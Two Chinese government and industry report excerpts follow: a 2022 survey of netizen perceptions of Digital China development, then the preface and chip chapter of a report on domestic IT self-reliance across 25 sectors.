合管理信息化平台。强化数字技术在山水林田湖草沙一体化保 护和系统治理中的应用。完善自然资源三维立体“ 一张图” 和国 土空间基础信息平台。加快推进智慧水利体系建设。深入实施 数字化绿色化协同转型发展行动。积极倡导绿色智慧生活方 式。 三是强化数字中国关键能力。构筑自立自强的数字技术 创新体系。加快推进数字领域关键核心技术突破,健全社会主 义市场经济条件下关键核心技术攻关新型举国体制,加速完善 以市场为主导、以企业为主体、产学研用高度协同的创新体系。 充分发挥科技型骨干企业在数字技术创新体系中的引领支撑 作用。加强知识产权保护,健全知识产权转化收益分配机制。 筑牢可信可控的数字安全屏障。推动网络安全法律法规和政策 体系持续完善,不断增强网络安全保障能力。建立健全数据分 类分级保护基础制度,持续完善网络数据监测预警和应急处置 工作体系,切实保障数据安全。 四是优化数字化发展环境。建设公平规范的数字治理生 态。及时调整不适应数字化发展的法律制度,持续完善数字领 域法律法规体系。健全数字领域技术标准体系,以标准化带动 数字技术产业创新。完善网络综合治理体系,构建科学、高效、 有序的管网治网格局。深入推进“ 清朗”“净网”“剑网” 系列专项 行动,强化网络内容治理,加强网络空间行为规范,强化网络 内容管理从业人员管理,推动网络空间持续净化。构建开放共 赢的数字领域国际合作格局。积极参与联合国、世界贸易组织、 二十国集团、亚太经合组织、金砖国家、上海合作组织、“ 中 国— 中亚五国” 等多边和区域机制框架内的数字领域国际合 作,持续推进《全球数据安全倡议》,积极参与数据跨境流动 等国际规则和标准制定,营造开放、包容、公平、公正、非歧 视的数字经济发展环境。建立多层面协同、多平台支撑、多主 体参与的数字领域国际交流合作体系,推动“ 数字丝绸之路” 建设走深走实,积极发展“ 丝路电商”。继续与有关国家商签数 字经济领域投资合作备忘录,培育数字经济投资合作新动能。 附件 2022 年数字中国发展网民感知情况分析报告 为了解各地区群众对数字中国发展情况的感知评价和 意见建议,国家网信办组织开展了 2022 年数字中国发展情 况网络问卷调查活动。调查范围覆盖我国 31 个省(自治区、 直辖市)的 18-70 岁网民,回收有效样本超过 18 万份。根据 回收数据,从数字化学习工作、数字化转型、数字公共服务、 数字化公共治理、数字素养与技能等方面对受访者感知情况 进行统计分析。参与调查的网民普遍认为,2022 年在数字中 国发展中的获得感、幸福感和安全感持续提升,数字化学习 工作广泛普及,生产经营各环节中的数字化转型深入推进, 数字公共服务更加普惠便捷,数字化公共治理成效进一步显 现。 一、数字化学习工作广泛普及 过去一年中,受到新冠肺炎疫情影响,数字技术在学习、 工作中的应用广度和深度加速提升。调查着重了解各地区群 众在“ 上网课” 和线上会议中的感受。从调查结果看,近六成 中小学生“ 上网课” 时间占课程总时长的比例超 20% ,约 45% 的受访者参加线上会议次数占总参会次数的比例超 20%。 ( 一)线上学习情况 调查主要从线上学习的网络流畅度、师生互动情况、学 习专注度等方面了解各地区中小学生“ 上网课” 的体验感受。 调查结果显示,50%以上受访者对于中小学生“ 上网课”体验 比较满意。在课堂网络质量方面,55.8%受访者对“ 线上课程 画面清晰、稳定流畅”表示非常或比较同意。在师生互动方面, 50%以上受访者对“ 通过线上能够及时完成作业并得到老师 反馈” 和“ 线上课程互动性强,能及时与老师取得沟通”表示非 常或比较同意。在学习专注度和课堂纪律方面,超 47%受访 者对“ 在线上课堂能够专心听讲” 和“ 线上课程能够有效维持 课堂纪律,保障到勤率”表示非常或比较同意。从地区来看, 浙江、上海、 山东、江苏、北京等地区受访者对“ 上网课” 的 体验感受满意度位于全国前列。 图 1 中小学生“上网课”体验感知情况 ( 二)线上工作情况 调查主要了解各地区群众通过“ 线上会议” 开展工作情况。 调查结果显示,线上会议已经成为工作会议的重要形式。 25.0%的受访者表示,参加的线上会议占全部工作会议的比 重在 20%至 40%之间,19.7%的受访者表示,参加的线上会 议占比超过 40%。从地区来看,北京、上海、新疆、西藏、 天津等地区受访者通过“ 线上会议” 开展工作的比例位于全国 前列。 图 2 参加线上会议感知情况 二、数字化转型加快推进 数字化转型是适应数字时代发展规律的必然选择。调查 主要从企业、农业数字化转型和政府为推动数字经济领域投 资就业采取的举措等方面, 了解各地区群众参与和感受情况。 ( 一)企业数字化转型 企业数字化转型是企业从工业经济时代迈向数字经济 时代的关键路径。调查结果显示,更多的企业在生产经营活 动中推进数字化转型,其中办公、管理等环节运用数字化技 术的比例明显高于设计、制造。57.0%的受访者认为企业较 多地运用了数字化办公技术,比 2021 年提升了 9 个百分点。 43.2%的受访者表示企业较多地运用了数字化管理技术, 比 2021 年提升了 10.7 个百分点。34.7%的受访者认为企业较多 地运用了网络化协同技术,比 2021 年提升了 10.5 个百分点。 此外,相比 2021 年,受访者中认为企业较多运用了数字化 研发设计技术和智能化制造技术的比例提升了 7.9 个百分点。 从地区来看,青海、浙江、云南、重庆、北京等地区受访者 对于本地企业推进数字化转型的感受更为明显。 图 3 企业数字化转型感知情况 ( 二)农业数字化转型 农业数字化转型是解放和发展农业生产力,提升农业综 合效益的重要举措。调查结果显示,相比 2021 年,在农业 领域数字化技术的应用更为普及,分别有 55.6%和 51.8%的 受访者认为周围在农业销售和种植领域运用数字化技术的 人数“ 变多了” ,超 40%受访者认为在农产品加工、养殖、园 艺领域运用数字化技术的人数“ 变多了”。从地区来看,浙江、 上海、江苏、湖南、 山东等地区受访者对于本地农业数字化 转型普及推广的感受更为明显。 图 4 农业数字化转型感知情况 (三)数字经济投资与数字就业 数字经济是推动经济高质量发展的重要引擎。近年来, 各地区加大数字经济发展投入力度,加强数字就业支持保障, 培育发展新动能。调查结果显示,30%左右的受访者知晓本 地政府采取了为数字技能培训项目和企业数字化转型提供 补贴、举办数字职业专场招聘会、出台数字人才扶持政策等 举措,46.9%的受访者知晓本地政府对数字产业的投资发展 提供金融、贷款、税费减免等支持。从地区来看,浙江、福 建、江西、湖北、江苏等地区受访者对政府采取的数字经济 投资和数字就业促进举措知晓度位于全国前列。 图 5 数字经济投资与数字就业感知情况 (四)数字家庭应用 智能家居是发展数字家庭,提升家庭生活便捷程度的重 要支撑。调查结果显示,2022 年,智能家居产品在群众日常 生活中加快普及应用。35.3%的受访者表示近一年来使用过 智能音箱,相较 2021 年的比例提升超一倍;31.0%的受访者 表示使用过可联网控制的空调、冰箱、洗衣机、厨房电器等 家用电器;表示使用过智能家居摄像头和智能门锁的受访者 占比分别为 25.1%和 20.2%。从地区来看,浙江、上海、江 苏、福建、广东等地区的受访者智能家居使用率更高。 图 6 智能家居应用感知情况 三、数字公共服务更加普惠便捷 数字化公共服务是提升群众获得感、幸福感的有效举措。 调查主要从数字医疗、数字交通、数字适老化服务等方面, 了解受访者对数字公共服务的知晓度和满意度等情况。 ( 一)数字医疗服务 作为数字时代的新型医疗模式,数字医疗服务有力促进 简化就医流程、改善就医体验、提高诊断效率、提升医疗服 务水平。调查结果显示,2022 年,我国数字医疗服务的知晓 度和使用率加快增长。受访者中了解本地能够提供线上缴费、 自助缴费机、线上查询检验报告、线上预约挂号等服务的比 例均达到 80%左右。从地区来看,浙江、上海、广东、湖南、 山东等地区数字医疗服务的知晓度位居全国前列。从城乡来 看,各项数字医疗服务的知晓度城镇均高于农村,其中线上 预约挂号服务的知晓度城乡差距为 7.2%,但远程医疗服务知 晓度城乡差距仅为 0.4%。在使用率方面,67.7%和 62.0%的 受访者表示使用过线上缴费和自助机缴费服务。从城乡来看, 城镇居民的线上预约挂号服务使用率比农村居民高 14. 1 个 百分点,线上查询检验报告使用率比农村居民高 12. 1 个百分 点,但远程医疗服务使用率农村居民则比城市居民略高 0.6 个百分点。从地区来看,浙江、上海、广东、湖南、福建等 地区受访者对于数字医疗服务的使用率位于全国前列。 图 7 数字医疗服务感知情况 ( 二)数字交通服务 数字交通服务是提升交通出行效率,改善受访者出行体 验的重要支撑。调查结果显示,2022 年,受访者对数字交通 服务的满意度进一步提升。67.5%的受访者对公交、地铁扫 码支付服务表示非常或比较满意,其中表示“ 非常满意” 的受 访者占比较 2021 年提升 9.8 个百分点。对智慧停车服务表示 非常或比较满意的受访者占比达 43.9%, 比 2021 年提升 9.3 个百分点。对交通信息实时推送、公交到站实时预报表示“ 非 常满意” 的受访者占比也提升了近 7 个百分点。从地区来看, 浙江、上海、福建、湖北、湖南等地区受访者对数字交通服 务的满意度位于全国前列。 图 8 数字交通服务感知情况 (三)数字文化服务 数字文化服务能够打通“ 文化服务” 最后一公里,对提升 群众的文化获得感具有积极作用。调查结果显示,过去一年, 各类数字文化场馆进一步普及,线上文化活动广泛开展。在 关注数字文化服务的受访者中,从知晓度方面看,近 90%的 受访者表示本地能够提供线上文化活动,超 80%的受访者表 示本地能够提供数字图书馆、数字博物馆等服务,浙江、上 海、广东、北京、江苏等地区受访者对数字文化服务知晓度 位于全国前列;从体验参与度看,49.3%的受访者表示参加 过线上文化活动,超 30%的受访者表示体验过数字图书馆、 数字博物馆、数字美术馆等服务,浙江数字文化服务的体验 参与度明显高于其他地区,上海、北京、江苏、 山东等地区 数字文化服务的体验参与度也位于全国前列。 图 9 数字文化服务感知情况 (四)数字适老化服务 提升数字适老化水平是帮助老年人跨越“ 数字鸿沟”,共 享美好数字生活的迫切需要。调查结果显示,近 65%的受访 者知晓本地通过开设老年讲座、提供专人指导、开展技能培 训、政务网站和 APP 改造等多样化举措促进老年人融入数字 生活。在上述受访者中,80.6%了解 “社区开展过针对老年 人的防诈骗宣讲、网络安全讲座等活动”,近 60%了解“ 在政 务大厅等场所有专人指导老年人操作自助设备或帮助线上 业务操作”,40%左右了解“社区对老年人进行数字技能培训” “本地政务网站和 APP 可以提供老年版模式或功能”。从地 区来看,浙江、重庆、湖南、湖北、江苏等地区受访者对于 数字适老化举措的知晓度位于全国前列。 图 10 数字适老化服务感知情况 四、数字化公共治理取得明显成效 数字化公共治理是提升治理效能,让人民群众更好享有 数字化红利的必要措施。调查主要从党政机关/事业单位数字 化能力、数字疫情防控、政务新媒体、基层数字化治理等方 面, 了解受访者对数字化公共治理的感知情况。 ( 一)数字疫情防控情况 数字技术为打赢疫情防控狙击战提供了有力支撑。调查 结果显示,在疫情常态化防控过程中,健康码等数字化服务 的便捷性、稳定性明显提升,受访者给予了积极评价。其中, 70%左右受访者对“本地健康码系统界面友好、功能齐备、使 用方便”“本地健康码系统运行稳定性有效提升”“ 可以便捷地 查询本地最新防疫政策” 等评价表示非常或比较同意,其中表 示“ 非常同意” 的受访者占比均高于 40%。从地区来看,浙江、 山东、湖南、福建、安徽等地区受访者对数字技术在本地疫 情防控中的应用成效认可程度位于全国前列。 图 11 数字抗疫感知情况 ( 二)党政机关/事业单位数字化能力 数字政务建设是建设网络强国、数字中国的基础性和先 导性工程。调查结果显示,党政机关/事业单位在线化、移动 化办公应用等方面取得积极成效,更加重视提升公务员和相 关干部数字素养和技能水平。78.3%的党政机关/事业单位受 访者表示所在部门内部服务事项能线上办理(如 OA 系统等), 78.2%的受访者表示所在本部门非涉密业务支持移动办公软 件处理。72.8%的受访者表示所在部门开展过数字素养和技 能相关学习培训。57.7%的受访者表示所在部门将数字素养 和技能水平作为干部选拔的考量因素。从地区来看,浙江地 区 85%以上的受访者表示所在单位开展了上述四方面数字 化能力建设,明显高于其他地区,体现了数字化改革的示范 引领作用。江西、江苏、河北、广东、北京等地区的占比也 高于 75%,位于全国前列。 图 12 党政机关/事业单位数字化能力建设感知情况 (三)政务新媒体感知情况 政务新媒体是政府部门发布政务信息、推进政务公开的 重要渠道。调查结果显示,2022 年政务新媒体在更新频率、 内容质量、粉丝互动等方面取得进展,影响力进一步提升。 70%以上受访者关注了本地政务新媒体账号。在关注过政务 新媒体账号的受访者中,对“ 内容更新频率快” 和“发布的内容 质量高”表示非常或比较同意的受访者占比均在 75%以上, 对“ 与粉丝互动活跃”表示非常或比较同意的受访者占比高于 65%。从地区来看,浙江、 山东、上海、湖南、湖北等地区 受访者对于本地区政务新媒体更新频率、内容质量和粉丝互 动等方面的满意度位于全国前列。 图 13 政务新媒体平台满意度 (四)基层数字化治理感知情况 基层数字化治理是实现社会信息及时交互,推动多元主 体参与社会治理,提升人民群众获得感、幸福感、安全感的 重要支撑。调查结果显示,2022 年,数字技术赋能政策信息 发布、受访者关切回应、社会治安防控等多个基层治理场景, 基层数字化治理成效进一步提升。70%以上受访者知晓本地 居住地社区(村委会)采取的数字化基层治理举措。56.2% 的受访者对居住地社区(村委会)“ 通过线上渠道及时发布政 策信息” 的举措表示非常或比较满意,对“ 通过线上渠道及时 回应居民意见建议” 的满意度高于 50%。从地区来看,浙江、 湖南、山东、安徽、湖北等地区受访者的基层数字化治理满 意度位于全国前列。 图 14 基层数字化治理满意度 五、数字素养与技能有待提升 数字素养与技能是数字时代生产生活的关键能力,是建 设网络强国、数字中国的重要基础。本次网络调查主要从数 字基础概念认知和常用数字技能两个方面,调研了解各地区 受访群众的能力水平。 ( 一)数字基础概念 调查围绕大数据特点、数据类型、芯片、计算机进制、 物联网、云计算等方面的基础知识,设置了若干认知判断题, 了解受访者数字基础概念的认知水平。调查结果显示,受访 者对不同数字基础概念的认知水平不一,不同地区和职业受 访者的认知水平差异也较为明显。在所有受访者中,6 道认 知判断题全部回答正确的占比为 9.4%,其中关于大数据特点 概念的判断准确率为 66.1%,关于计算机芯片概念的判断准 确率为 56.0%,关于计算机进制概念的判断准确率为 53.0%。 从职业来看,企业中高层管理人员中答对全部 6 道题的占比 为 15.9%,位于所有职业首位,其次是专业技术人员 12.7%, 党政机关/事业单位工作人员答对全部题目的占比为 11.8% 。 从地区来看,浙江、上海、福建、广东、湖北等地区受访者 对于数字基础概念问题的判断准确率位于前列。 图 15 数字基础概念认知问题调查情况 ( 二)常用数字技能 本次调查从数字设备操作、数字工具编辑、数字程序开 发等 3 方面设置了 6 道基础问题, 了解各地区群众在工作生 活中常用数字技能的掌握能力。调查结果显示,受访者掌握 不同数字技能的程度存在较为明显差异,不同职业和地区间 也有较大区别。56.2%的受访者认为自己同时掌握 3 项数字 设备的基础操作技能,包括使用智能手机的基本功能 (88.1%)、使用网络语音或视频聊天(69.0%)、搜索网络信 息和下载软件应用(64.1%)。33.8%的受访者认为自己同时 具备 2 项数字工具的基础编辑技能,包括编辑文档与音视频 (53.3%)、使用电子邮件(43.0%)。 15.1%的受访者认为自 己具备数字程序基础开发技能,如编写简单程序。在所有受 访者中,认为自己同时具备数字设备基础操作技能和数字工 具基础编辑技能的受访者占比 32.6%,在此基础上还掌握数 字程序基础开发技能的受访者占比为 11.6%。从职业来看, 在校学生1的数字设备基础操作能力和数字程序基础开发能 力高于其他职业群体,企业中高层管理人员的数字工具编辑 能力最高。从地区来看,浙江、福建等地区的受访者在调查 问题中反映出较高的数字技能水平。 1 仅包括 18 岁以上的在校学生。 图 16 受访者数字技能自评估情况 六、数字中国发展网民建议 ( 一)总体评价 调查结果显示,受访者普遍认为,2022 年我国数字化发 展成效在多个领域得到充分体现,群众的工作生活更加便捷, 政府的服务治理效能进一步提升。60%以上受访者对各个领 域数字化发展得到提升的评价表示非常或比较同意。其中, 超 75%受访者对“ 日常生活中使用网络的场景更多了”表示非 常或比较同意,70%左右受访者对“ 数字化相关的各类宣传更 多了” 和“ 能够在网上办理的事项(政府相关)更多且更加便 捷了”表示非常或比较同意,60%以上受访者对“ 网速更快了, 信号更强了”“本地举办的数字领域论坛会议/讲座培训等活 动更多了”表示非常或比较同意。 图 17 数字中国发展网民总体评价 ( 二)网民建议 通过对调查收到的 10 万余条有效建议的大数据词频分 析,“便捷”“ 数据”“ 生活”“服务” 等成为受访者建议中的最热 关键词。 图 18 数字中国发展建议关键词 数字化工作方面,受访者希望进一步优化工作场景中的 互联网应用,加强政府对社会互联网平台信息推送的常态化 监管,官方平台发布更多贴近民生的有用信息。希望完善政 府各部门的数据联通,简化网上办理流程。基层政府工作人 员建议精简各类 APP 和小程序使用,减少各级政府自建 APP。 农村居民普遍希望加强智慧农业建设,更好利用数字化成果 促进农业发展,减轻农民负担。数字化生活方面,受访者希 望进一步加强互联网基础设施建设,扩大优质网络覆盖面, 尤其是偏远地区和农村地区。建议提升 5G 信号的稳定性, 扩大 5G 覆盖面并降低 5G 资费。数字化公共治理方面,受 访者认为数字化建设需要特别照顾老年群体感受,保留非数 字化办事渠道,多组织面向老年人的培训指导。希望进一步 加强各级政府信息公开和政策发布的权威性、一致性和便民 性。数字素养与技能方面,受访者希望加强对数字化相关知 识和技能的培训指导,组织互助交流活动,建议更大范围地 普及防诈骗知识,提升受访者防范能力。
standards
前 言 2016年,习近平总书记在网信工作座谈会上发表重要讲话,指出“互 联网核心技术是我们最大的‘命门’,核心技术受制于人是我们最大的隐患”, 要求“核心技术要取得突破,就要有决心、恒心、重心”。 科技创新,企业是主体。正是为了落实总书记的指示精神,自2018年 以来,网信自主创新调研报告编委会组织业界专家和企业代表编写了这本报 告。 《网信自主创新调研报告》已经连续编写5年了。这5年来,越来越多 的业界同仁关注并参与了报告的编写工作。参与编写单位从2018年的三十 多家发展到2023年的近两百家。 解决“卡脖子”问题,不仅仅是技术问题,同时也是产业生态问题;不 仅仅是一两家企业的事,需要全产业链做好协同配合;不仅仅是三年五年的 集中攻关,需要的是一代人甚至几代人的埋头苦干。正是基于这种考虑,编 委会在报告编写之初就确立了“坚持脚踏实地、坚持实事求是、坚持集思广益” 的工作原则。全体参编人员不以系统性、完整性为目标,不去追求教科书式 的表述方式,而是站在产业一线的视角将取得的成绩和遇到的问题呈献出来, 并尝试着对具有代表性的问题提出对策建议。 《2022 网信自主创新调研报告》编写工作启动之际,为了确立本年度 报告的主题,编委会对部分行业用户和产业界代表开展了深入的访谈。通过 访谈,我们对当前网信自主创新工作的现状和未来一段时间的目标有了初步 的认识:首先,某重点领域替代工作初见成效,但“替而不用”的现象仍然 存在;其次,更多领域的替代工作即将展开,面临更加复杂多样的应用系统, 用户和产业界面临的一个共同的问题是,自主创新的网信产品如何尽快满足 应用需求,在降低替代成本同时保证业务系统的性能、稳定性、可靠性。 基于上述认识,编委会确定了本年度报告的主题为“如何深化网信自主 创新工作”。报告按照基础篇和应用篇两个方向组织材料,对芯片、操作系 统、数据安全等25个产业节点进行了讨论。各个章节都按照“现状、原因、 对策”三个层次进行展开: “现状”部分着眼于自主创新的技术、产品和解 决方案在重点行业领域的应用情况(部分没有获得较大范围应用的节点仍然 侧重于技术和产品的分析); “原因”部分站在厂商的视角对导致这种现状 的原因进行了初步分析; “对策”部分有针对性地提出了产业界需要重点开 展的工作。 各章节的主要内容概述如下: 1、 国产芯片的性能不断提升,应用日趋广泛,但核心技术和产业生态 是影响应用推广的重要因素。后续要持续关注核心技术研发、打造自主技术 体系,同时完善产业生态、加强产品化工作,提升用户对国产芯片的信心。 2、 国产固件在关键技术上取得突破,全面支持国产基础软硬件平台, 应用范围不断扩大,但仍面临市场惯性和产业生态等困难。后续需要加大研 发投入,完善标准化工作,为可持续发展奠定基础。 3、 国产操作系统进入发展关键期,行业需求明确、产业稳步发展,但 面临着行业需求各异的问题。未来,操作系统厂商需要加强开源协作,缩短 操作系统生态差距,以适应行业需求的多样化。 4、 自主创新的存储技术和产业取得了快速发展,但仍面临着规范市场 行为、提升产品成熟度和性价比、扩大市场占有率等问题。未来要加快技术 迭代、加快规模应用,通过技术和市场相互促进,进入良性循环,快速占领 重点行业市场。 5、 国产关系型数据库和云数据库快速发展,但供给侧赛道拥挤、行业 应用对数据库要求更高、国产化适配和数据迁移工作量巨大是产业面临的问 题。数据库厂商要持续提升技术能力,不断完善标准体系,加强产业链协同, 支撑自主创新向行业应用深化发展。 6、 国产中间件的行业应用成效较好,但覆盖面窄、分布不均、总体市 场份额偏低,主要原因在于成熟的商用中间件供给能力不足、用户对中间件 软件的理解不到位、缺乏国产化替代的主动性。中间件厂商要加快高性能高 可靠产品的研发,共建产业生态,促进国产中间件的应用推广。 7、 国产整机市场走势低平,整机企业选择坚守,主要原因在于政策依 赖度过高,造成短期经营数据下滑,另外,多技术路线给厂商和用户带来困扰, 供给能力和使用习惯也是制约整机产品在行业市场的表现因素之一。未来, 整机厂商应立足自身谋求创新发展新路径。 8、办公软件使用情况参差不齐,流式文件和版式文件应用范围相对较广, 但也存在替而不用的现象。产品、生态、标准和政策等是影响未来发展空间 的重要因素,相关企业应着重练好内功,推动产业高质量扩展。 9、 国内浏览器厂商掌握了部分关键技术,正在努力拓展行业用户,但 投入不足、开源和生态是深入行业过程中面临的共性问题。相关企业需要加 强内部生态协同、加强周边生态配合,以促进浏览器产业健康快速地发展。 10、 国产打印设备在产品、技术、生态、安全的协同发展方面取得了不 错的效果,产品种类不断丰富,技术积累持续深入,但高端产品的空白是影 响市场拓展的重要问题。未来需要不断提升产品与服务质量,迎接更大的市 场空间。 11、 依托自主创新的IP 网络新技术,重点行业IP 网络基础设施正加速 替代,行业网络稳步升级。自主数据通信芯片是制约高端网络设备研制的重 要因素,也是需要重点突破的产业瓶颈。 12、 国内软件测试市场严重依赖国外,有断供风险。国产软件测试工具 产品覆盖较全,但总体水平相对落后。相关产业面临理论、生态、人才、标 准等共性问题,需要把握市场机遇,突破关键技术、营造良性环境,快速做 大做强。 13、 商用密码正在与新技术快速融合,应用领域不断扩宽。深化商用密 码应用,产业界面临法律法规标准的引导作用发挥不充分、产业自身的创新 发展、用户对商用密码的认知和重视程度不够等三方面挑战。在打造商用密 码高质量供给体系过程中,需要强化商用密码应用顶层设计、提升商用密码 自主创新能力。 14、 自主边界产品逐步扩大应用范围,但总体不占优势。面对产业链上 游对边界安全的影响,相关厂商需要立足自身解决问题,走出边界安全的新 路。 15、 国产化终端安全在从合规驱动转向价值驱动的过程中面临效能方面 的挑战,需要多维度提高国产化终端安全防护能力,构建一体化终端安全防 护能力,发展内核级防护能力,构筑终端安全的底层防线。 16、 云计算安全重点讨论了云原生安全技术及其在市场侧的表现。目前 云原生的价值被市场接受和认可,解决云原生安全问题主要是解决云原生环 境中业务的安全问题,提供具备云原生特征的安全解决方案,构建体系化的 安全防护能力。 17、 国产化在数据生命周期的各个阶段都提出了新的安全课题。因此, 数据安全与应用场景融合面临诸多困难。未来,数据安全应坚持走与业务场 景融合之路: 一是完善相关标准,推进生态建设;二是加大适配工作投入, 提高适配工作效率;三是促进数据库安全漏洞研究和生态建设;四是通过解 决方案创新促进应用场景融合。 18、 国产化背景下高级威胁检测对抗持续升级,面临现有产品检测能力 不足,对特定场景关注不够,单一手段对高级威胁防护效果不佳等问题。未来, 高级威胁检测向新技术与联合防护方向发展。 19、漏洞管理能力相对滞后,主要表现在发现能力滞后于软件开发模式, 修复模式滞后于开源生态发展,治理工作面临安全与效率的两难。主要原因 是缺乏体系化视角,今后应从漏洞管理向漏洞治理方向演进。 20、 国产反恶意代码引擎发挥了关键卡位作用,但面临威胁数量和复杂 度不断增加、网络安全威胁正在向新场景加速泛化、容易被获取分析和测试 等三方面的挑战。未来应通过叠加式创新应对效能衰减。 21、 传统的安全管控体系难以应对日益复杂的安全需求,现有的安全管 控体系亟需创新发展。未来,数字化安全管控体系是必然趋势。 22、 工控安全产品和技术方案日益完善,工控安全覆盖了全工业生产周 期。然而,工控安全面临供应链、新技术和人才三方面的风险,应以技术创 新引领工控安全高质量发展。 23、 电子数据取证产业开始国产化道路探索,但国产化进程动力略显不 足。相关企业需要在开放合作、开发适用的产品、培养人才等方面发力,实 现可持续发展。 24、 开源软件的供应链风险没有得到足够的重视。防范开源软件供应链 安全风险需从建立开源软件安全治理体系、建设开源软件供应链安全情报库、 发展国内开源生态三个方面着手。 25、 国产灾备产品在技术和应用上仍有短板,产业发展面临核心组件的 技术壁垒、用户对国外灾备产品有较强的依赖性、用户对于灾备业务的理解 还不到位等三方面的问题。灾备厂商需要增强服务意识和运营能力,关注灾 备的全生命周期,谋求灾备产业的快速发展。 1、 芯片 2、 固件 3、操作系统 4、 存储 5、 数据库 6、 中间件 7、 整机 8、 办公软件 9、 浏览器 10、 打印设备 11、IP 网络 12、 软件测试工具 1.芯片 近年来,以通用处理器为代表的国产芯片设计能力和工艺技术不断提升, 在性能上已接近国际主流水平,生态也越来越完善,基于国产芯片的IT 设 备在应用中使用越来越广泛,国产芯片产业发展步入快车道。然而,面对西 方对我国芯片产业的持续打压,关键核心技术包括指令系统、IP 核和生产工 艺等仍是制约我国芯片产业发展的主要问题,芯片设计软件也是一个短板, 被“卡脖子”的情况依然严峻。坚持走自主创新的产业发展路线,不断提高 芯片性能、降低功耗、丰富产业生态、扩大应用仍然是亟需解决的重要问题。 1.1 国产芯片的性能不断提升,应用日趋广泛 1.1.1国产芯片性能接近或达到国际同类产品水平 在通用处理器方面,国产CPU 芯片已在自主指令系统上实现突破,对 海外架构的依赖程度逐步降低。龙芯发布了自主指令系统 LoongArch, 申威 发布了自主指令系统 SW64。 自主芯片厂商在着力解决核心技术受制于人问 题的同时,加强与产业链下游企业的合作,通过完善固件、操作系统内核、 编译器工具链、虚拟化软件等配套的软件系统,逐步建立了相对完善的自主 芯片生态体系。随着设计能力和工艺技术的不断提升,国产桌面CPU 单核 SPEC CPU2006定点 Base 分值超过26分,峰值性能分值超过30分,性能正 逐步接近国际主流水平。国产服务器 CPU单芯片多核 SPEC CPU2006定点 Base分值超过400分, KVM 虚拟机计算效率95%以上,可全面满足云计算、 数据中心核心业务处理的需求。国产CPU 在强调“自主设计”的同时关注了“安 全设计”并实现了深度融合,为落实等级保护2.0、支撑可信计算和国密算 法替代,加强网络安全漏洞防护提供了CPU 核级的内生支持能力。 在网络控制器芯片方面,国内厂商已实现1G\10G\25G\50G\100G 网络智 能控制芯片的规模量产,在兼容国产主流 CPU 芯片和操作系统,功能和性 基础篇-芯片 能对标国际主流厂商的同时,体积功耗、性能加速上已优于国外同类产品。 在安全性方面,国产网络控制芯片实现了与国密算法安全机制的融合,增强 了产品的安全性和灵活性。 在国产SSD 主控芯片方面,国产芯片兼容国内主流 CPU 厂商,性能、 稳定性都已接近国外先进水平,顺序读写速度可达7000/6000MBps,4K 随 机读写可达 1000k/900kIOPS; 在安全性方面,国产主控芯片通过支持国密 SM2/SM3/SM4 算法,为IT 设备的安全性提供了多重保障。 在GPU 芯片方面,国产GPU 性能达到国际主流中档产品水平。国产芯 片采用 GDDR6 或 GDDR6X 显存,最大速率支持19Gbps, 最大支持16GB 显存容量;采用了先进的Chiplet Innolink 封装技术,将不同工艺制成的裸片 封装在一个芯片中,实现更高的性能和稳定性,具有强渲染能力、高带宽、 高安全性、低功耗等特点。 在密码芯片方面,国产芯片已在国外的HSM 基础上有所突破,实现了 国际标准和国家标准的“双”支持,并支持信息安全评估和商用密码产品检 测的“双”认证。国产芯片在功能和性能上已经具备了全面替代国外芯片的 条件,产品覆盖 PKI 、SSL VPN 、IPSec VPN、云计算、大数据、物联网等 信息安全场景,具备高安全、高可靠、高性能、低功耗等特点。 在安全芯片方面,国产TPCM 芯片通过内置主动免疫安全算法,实现了 保护范围覆盖CPU 、存储器、固件、操作系统与可信功能组件的目标,能够 支撑安全部件与计算部件并行独立运行,并对计算部件进行可信监控。 1.1.2 国产芯片在重点行业领域取得越来越广泛的应用 在国产CPU 厂商和下游产业节点的共同努力下,基于国产CPU 的电脑 终端、服务器、存储等设备已经能够基本满足党政、金融、能源、电信、交 通、教育等行业的要求。产业界打造了面向关键行业的国产化解决方案并形 成了落地案例,能够满足云计算、边缘计算、分布式存储等应用场景需求。 在党政领域,国产CPU 芯片已覆盖全国,芯片年出货量达到数百万颗,完 全满足党政办公系统的业务需求。在金融行业,基于国产化 CPU 的设备已 经在银行、证券、保险等各类型金融机构部署,并初步发挥了作用,能在一 定程度上支撑金融行业业务需求。在能源行业,数据采集终端、控制系统、 网关产品等设备已经实现了基于国产CPU 的替代,水电、风电智能监控项 目也有序开展了国产化替代。在电信行业,国产CPU 厂商与三大运营商合作, 已在办公系统、营业厅终端机、网关监控、呼叫中心、5G 等场景实现国产 化替代。在交通行业,国产CPU 应用于轨道交通、车联网、交通信息化等 诸多领域,相关产品和方案覆盖高铁远程监控与诊断系统、城市交通智能控 制系统、交通环境检测系统等诸多领域。在教育行业,国产CPU 教学实验 平台已在全国上百所高等院校使用;基于国产CPU 的教育电脑、电子教室、 STEAM 课程、机器人编程等,形成了全面完整的信息技术国产化教学方案。 国产网络控制器芯片经过规模化运行,成熟性、先进性和创新性得到了 验证,已在国家金融、电力、能源、交通和电信等行业广泛应用。国产 SSD 主控芯片和安全加密芯片,产品覆盖数据中心、边缘中心、工业控制、消费 类终端和车载电子等多个行业,广泛应用于党政、金融、电力、轨道交通、 平安城市等多个领域,并携手某运营商研究院共同推动RISC-V 在数据中心 场景中的应用。 1.1.3 国产芯片的行业应用生态需要进一步完善 目前,国产芯片的整体市场份额与Intel、AMD 等国际巨头公司相比还 有比较大的差距。主要问题在于国产芯片的行业生态需要进一步完善,用户 认可度有待进一步提升。目前,行业应用基本上都是基于Windows 系统的, 基础篇-芯片 Linux 桌面应用与 Windows 相比,应用软件数量相对较少,很多行业软件需 要重新适配。另外,专用设计软件如AutoCAD、EDA 等不兼容国产芯片架构, 也不在国产架构上做应用迁移。 1.2核心技术和产业生态是影响国产芯片应用的重要因素 1.2.1 核心技术能力不足和供应链风险是面临的主要问题 目前,部分国内芯片厂商基于国外的指令集架构设计芯片,基于国外的 IP 核“攒”芯片。由于没有掌握芯片设计的关键核心技术,导致信息产业严 重依赖国外技术体系,存在信息安全和供应链安全风险。即便是自主设计的 芯片,在核心IP 设计能力方面与国外厂商也存在一定差距,特别是EDA 设 计工具、FPGA仿真验证系统、制造工艺等方面与国外先进水平有较大的差距。 以国产 EDA 工具为例,虽然在部分单点工具方面取得了突破,模拟类工具 已实现全面布局,但在数字仿真、逻辑综合、建模、布局布线等领域长期依 赖国外产品;仿真验证系统在28nm 以上高端设计几乎被国外垄断;高端芯 片的先进制程工艺技术,主要被国外公司所掌握,国内厂商与他们比仍落后 2-3代;在形成产业化的大规模生产交付阶段,还是以台积电等老牌厂商为主。 